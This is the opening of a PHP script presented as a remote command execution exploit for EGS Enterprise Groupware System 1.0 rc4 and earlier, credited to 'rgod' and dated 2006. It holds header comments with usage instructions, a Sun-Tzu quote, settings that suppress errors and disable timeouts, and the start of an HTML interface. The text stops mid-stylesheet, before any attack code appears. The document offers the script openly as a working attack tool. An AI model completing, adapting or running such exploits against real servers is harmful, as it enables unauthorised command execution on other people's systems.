1 <?php
2 # −−−egs_10rc4_php5_incl_xpl.php 17.57 13/02/2006 #
3 # #
4 # EGS Enterprise Groupware System <=1.0 rc4 remote commands execution exploit #
5 # coded by rgod #
6 # site: http://retrogod.altervista.org #
7 # #
8 # −> works against PHP5 #
9 # usage: launch from Apache, fill in requested fields, then go! #
10 # #
11 # Sun−Tzu: "Thus the energy developed by good fighting men is as the momentum #
12 # of a round stone rolled down a mountain thousands of feet in height. So #
13 # much on the subject of energy." #
14
15 error_reporting(0);
16 ini_set("max_execution_time",0);
17 ini_set("default_socket_timeout", 2);
18 ob_implicit_flush (1);
19
20 echo’<html><head><title> ******** EGS <= 1.0 rc4 remote commands execution *****
21 </title><meta http−equiv="Content−Type" content="text/html; charset=iso−8859−1">
22 <style type="text/css"> body {background−color:#111111; SCROLLBAR−ARROW−COLOR:
23
#ffffff; SCROLLBAR−BASE−COLOR: black; CURSOR: crosshair; color: #1CB081; } img
24
{background−color: #FFFFFF !important} input {background−color: #303030
25
!important} option { background−color: #303030 !important} textarea
26
{background−color: #303030 !important} input {color: #1CB081 !important} option
27
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
28
{background−color: #303030 !important} select {font−weight: normal; color:
29
#1CB081; background−color: #303030;} body {font−size: 8pt !important;
30
background−color: #111111; body * {font−size: 8pt !important}